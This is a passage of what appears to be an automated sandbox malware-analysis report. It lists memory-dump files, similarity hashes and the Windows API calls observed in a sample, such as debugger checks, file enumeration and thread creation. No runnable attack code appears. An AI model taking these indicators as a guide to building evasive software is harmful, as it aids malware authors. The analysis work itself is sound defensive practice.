                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c833190d3595b4907967d4d4129b7b381ff8ffd123d7f024cd91791e4d9d99b7
                                                                                                                                                                                                                                              • Instruction ID: d9bc898946f9306035358f56dbc86089230a692f1bc291e899106b41a16c2939
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c833190d3595b4907967d4d4129b7b381ff8ffd123d7f024cd91791e4d9d99b7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D023DB1E1121A9FDF14CFA8D8806ADF7F5FF48314F24826AE515EB380DB31A9518B90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00240A09
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1974802433-0
                                                                                                                                                                                                                                              • Opcode ID: ab2832a391f00281c41cf9666c3b738cb0a8741c0f8ab28a306e6b4f3ada2bf9
                                                                                                                                                                                                                                              • Instruction ID: f5d83bbc420a9728384a5b52309c370292087bf9e9632e02ab9214bb21036c68
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab2832a391f00281c41cf9666c3b738cb0a8741c0f8ab28a306e6b4f3ada2bf9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4771D3719152699FDF29EF24CCCDAAEBBB8EB45304F1441D9E249A3211DA304ED58F14
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0022D87B
                                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0022D947
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0022D960
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0022D96A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                                                                                              • Opcode ID: 17441f0f4182c9501f9ea5754de5c91f3b4729addcd9c729e4828a36eacc39da
                                                                                                                                                                                                                                              • Instruction ID: 87318b0b3a2002fb6552fe8fae9d92df701c15a6ed94edbb7873bcfc33b0b26a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17441f0f4182c9501f9ea5754de5c91f3b4729addcd9c729e4828a36eacc39da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A310C75D153299BDF21DFA4E8497CDBBB4AF08700F1041AAE40CA7250E7709B85CF45
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00221F53
                                                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00221F6A
                                                                                                                                                                                                                                              • CreateWindowExW.USER32 ref: 00221FCA
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00221FD4
                                                                                                                                                                                                                                              • GetMessageW.USER32(Christmas Balls,00000000,00000000,00000000), ref: 00222000
                                                                                                                                                                                                                                              • GetMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0022203D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$ClassCreateErrorHandleLastModuleRegisterWindow
                                                                                                                                                                                                                                              • String ID: Christmas Balls$CreatingTool$Keep low...$[err id]: %i
                                                                                                                                                                                                                                              • API String ID: 91802587-478130180
                                                                                                                                                                                                                                              • Opcode ID: e9424596f36dfe73731dda26162ef79a2a11388a2e39f1346ffa3f35b28fc4ff
                                                                                                                                                                                                                                              • Instruction ID: 150aa13a4215b8f1aa0a404bc79e28819560cd65be722921487d5a385dfba0c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9424596f36dfe73731dda26162ef79a2a11388a2e39f1346ffa3f35b28fc4ff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A641D370A28341EFD300DF60E849B2BB7E4BF98705F00561CF9889B250DB71E964CB56
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 002220E8
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002220F9
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0022214A
                                                                                                                                                                                                                                                • Part of subcall function 0022D0B6: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 0022D0C2
                                                                                                                                                                                                                                                • Part of subcall function 0022D0B6: GetExitCodeThread.KERNEL32(?,?), ref: 0022D0DB
                                                                                                                                                                                                                                                • Part of subcall function 0022D0B6: CloseHandle.KERNEL32(?), ref: 0022D0ED
                                                                                                                                                                                                                                                • Part of subcall function 00233E7D: CreateThread.KERNEL32(?,?,00233F95,00000000,?,?), ref: 00233EC6
                                                                                                                                                                                                                                                • Part of subcall function 00233E7D: GetLastError.KERNEL32 ref: 00233ED2
                                                                                                                                                                                                                                                • Part of subcall function 00233E7D: __dosmaperr.LIBCMT ref: 00233ED9
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 002221AF
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 002221E9
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 002221F0
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 002221F7
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00222204
                                                                                                                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00222213
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFileLastNameObjectSingleWait__dosmaperr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 686914455-0
                                                                                                                                                                                                                                              • Opcode ID: f32ccb1c666f0ea549441fe1678c05689d7f7244cc6041f5e3522d2b4b1f2bcc
                                                                                                                                                                                                                                              • Instruction ID: 1013450a05749b4f4227301631fc39a85d268647b1047850f91b89b6b547fff7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f32ccb1c666f0ea549441fe1678c05689d7f7244cc6041f5e3522d2b4b1f2bcc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231EAB1A60321BBE7207FE0BC07F9A76A49F45B40F044418FA4C6B1C5EAB19574CB97
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 127012223-0
                                                                                                                                                                                                                                              • Opcode ID: 77ea1443373636ce9c6385b5fcd5abb3b330277f75d3d813c7ad3b832e09d4ba
                                                                                                                                                                                                                                              • Instruction ID: a77b1807e77199eff7a30aefdfe913daa1513ce3fa1fe404cdc3e68e3cf591f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77ea1443373636ce9c6385b5fcd5abb3b330277f75d3d813c7ad3b832e09d4ba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF71F87293024A6FDF299FA48C82FAFB7B9DF45310F150059E944B7242D7759CA0CB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0022DECC
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0022DEF8
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0022DF37
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0022DF54
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0022DF93
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0022DFB0
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0022DFF2
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0022E015
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2040435927-0
                                                                                                                                                                                                                                              • Opcode ID: 4c068d61e97adb24429eacd47a5f5691f4dd4e23b3c31fca3d52657dfa16a9e4
                                                                                                                                                                                                                                              • Instruction ID: 89950e66e1e7595f73e5d2471849ea4cf1da5f15be1750b1ef41ca9c0f1f1258
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c068d61e97adb24429eacd47a5f5691f4dd4e23b3c31fca3d52657dfa16a9e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2051D472920226BFEF204FE0EC45FAA7BA9EF44780F114425F911AA150D7B4DE219B54
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                                                                                              • Opcode ID: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                              • Instruction ID: 3190abb938c0f5b758e989a418c3d18af350b9def9a9eeebebc4a859e9c5212b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90a798cb3167070a9428d5a8ad016659465e7669ef58dc39ee64ab71c5640075
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42B17AB2E243569FDB15CF28DC82BEEBBA5EF15310F144155E944AB282D370A921CBA0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0022EE37
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0022EE3F
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0022EEC8
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0022EEF3
                                                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 0022EF48
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                              • Opcode ID: ad637540a7b5646bc0f00c4f08d7a01b2613ab558253f0e6d900155f45e38cbf
                                                                                                                                                                                                                                              • Instruction ID: e72c0c2e193a5776cd15d3e4c6090d2940bbf3510cc04673f5e240b3499a8810
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad637540a7b5646bc0f00c4f08d7a01b2613ab558253f0e6d900155f45e38cbf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D41E934E20229ABCF10DFA8D845A9EBFB5AF45324F168065F8149B352D731DE21DF91
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32(00256958,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0022DD3B
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00000008,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0022DD5A
                                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000), ref: 0022DD88
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000), ref: 0022DDE3
                                                                                                                                                                                                                                              • TryAcquireSRWLockExclusive.KERNEL32(00000008,ios_base::badbit set,?,?,00000000,0024AD5D,000000FF,00000000,00229652,?,?,?,?,?,?,00000000), ref: 0022DDFA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                              • String ID: ios_base::badbit set
                                                                                                                                                                                                                                              • API String ID: 66001078-3882152299
                                                                                                                                                                                                                                              • Opcode ID: a64d147452ff26227a70d38b6c82082fc3297f7a6e8053c37788ef63582e4859
                                                                                                                                                                                                                                              • Instruction ID: 983be9aeb6471bf1d9725b9ad3277ba66d42b1dc639005d003c8da89954ad2d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a64d147452ff26227a70d38b6c82082fc3297f7a6e8053c37788ef63582e4859
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF417D32920A27EFCB20DFA4E5849BAB3F4FF18311B514919D456DB540D770FA61CB50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,0023B9C1,002234FA,?,00000000,0022A3DD,002234FC,?,0023B596,00000022,FlsSetValue,0024E054,0%,0022A3DD), ref: 0023B973
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                              • Opcode ID: d4cccbc1855d307a3b7bf5be4c47e850d7a1a139ccac137ecc744e01a2c1b45b
                                                                                                                                                                                                                                              • Instruction ID: 3cbd70f9f200289031854e3fd5a0426be057d20a68fd37b401bec59be8cfd047
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4cccbc1855d307a3b7bf5be4c47e850d7a1a139ccac137ecc744e01a2c1b45b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C21D5B2A61316BBC7239F20EC45B5A7768DF517B1F250110EB15A72D0D770EE10CAD0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 0022B85E
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0022B868
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0022B87F
                                                                                                                                                                                                                                                • Part of subcall function 0022A613: std::_Lockit::_Lockit.LIBCPMT ref: 0022A624
                                                                                                                                                                                                                                                • Part of subcall function 0022A613: std::_Lockit::~_Lockit.LIBCPMT ref: 0022A63E
                                                                                                                                                                                                                                              • codecvt.LIBCPMT ref: 0022B8A2
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0022B8D9
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                              • String ID: py%
                                                                                                                                                                                                                                              • API String ID: 3716348337-508143546
                                                                                                                                                                                                                                              • Opcode ID: 9a5a12544ee1248371d6425e778b3c0a02bc814f2bc9becc665d2ecb0fa5424c
                                                                                                                                                                                                                                              • Instruction ID: 2de25f5d20141fe9068a9a9c7fcb0189ead4195dc74ccc324692710c3dbd0aa2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a5a12544ee1248371d6425e778b3c0a02bc814f2bc9becc665d2ecb0fa5424c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D601E131C2412AABCB06EFE4B8556BD7769AF44310F144809F40067291CF709E208F92
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0022E142
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0022E150
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0022E161
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.2858660614.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858640081.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858689292.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858711979.0000000000256000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858739351.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.2858765680.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
